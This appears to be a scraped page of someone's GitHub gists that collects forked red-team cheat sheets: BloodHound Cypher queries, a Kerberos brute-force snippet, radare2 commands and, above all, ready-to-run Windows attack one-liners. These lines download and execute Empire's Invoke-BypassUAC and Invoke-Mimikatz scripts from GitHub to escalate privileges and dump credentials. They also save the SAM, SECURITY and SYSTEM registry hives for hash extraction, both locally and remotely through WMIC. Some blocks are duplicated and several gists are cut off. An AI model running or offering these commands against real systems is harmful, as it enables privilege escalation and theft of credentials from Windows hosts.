Adam Dekan adamdekan

## cypherqueries.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                adamdekan
                / cypherqueries.md
            
            
              Created
              May 23, 2024 09:19
                — forked from seajaysec/cypherqueries.md
            
              
                custom bloodhound queries for the neo4j console
              
          
    Cypher Queries
Cypher Queries can be entered into the neo4j console, accessible at http://localhost:7474. These often return text-based content. There's a max of 1000 displayed rows within the console, however each query result can be downloaded as a CSV for more in depth analysis. When pasting, replace all instances of "EXAMPLE.COM" with the domain name that you are operating on. These are from a wide range of sources. A lot of them came or were inspired by discussions on the Bloodhound Slack.
Basic
Generate list of all operating systems
MATCH (c:Computer)


## pentesting_cheatsheet.ps1
[+] Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

#Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

#Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

#Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                adamdekan
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              January 12, 2024 12:27
                — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## yet another radare2 cheatsheet.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                adamdekan
                / yet another radare2 cheatsheet.md
            
            
              Last active
              December 29, 2023 10:59
                — forked from williballenthin/yet another radare2 cheatsheet.md
            
          
    radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

analyze all: aa
show sections: iS
list functions: afl
list imports: ii
list entrypoints: ie
seek to function: s sym.main


## hashdump.reg
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py

#Do this remotely
wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"
	[+] Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

	#Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

	#Invoke-Mimikatz: Dump credentials from memory
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

	#Import Mimikatz Module to run further commands
	powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
	reg.exe save hklm\sam c:\temp\sam.save
	reg.exe save hklm\security c:\temp\security.save
	reg.exe save hklm\system c:\temp\system.save
	secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

	#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py

	#Do this remotely
	wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"